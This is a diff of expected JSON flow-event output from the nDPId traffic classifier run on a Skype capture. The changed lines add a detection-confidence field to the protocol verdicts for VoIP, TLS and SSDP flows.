+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
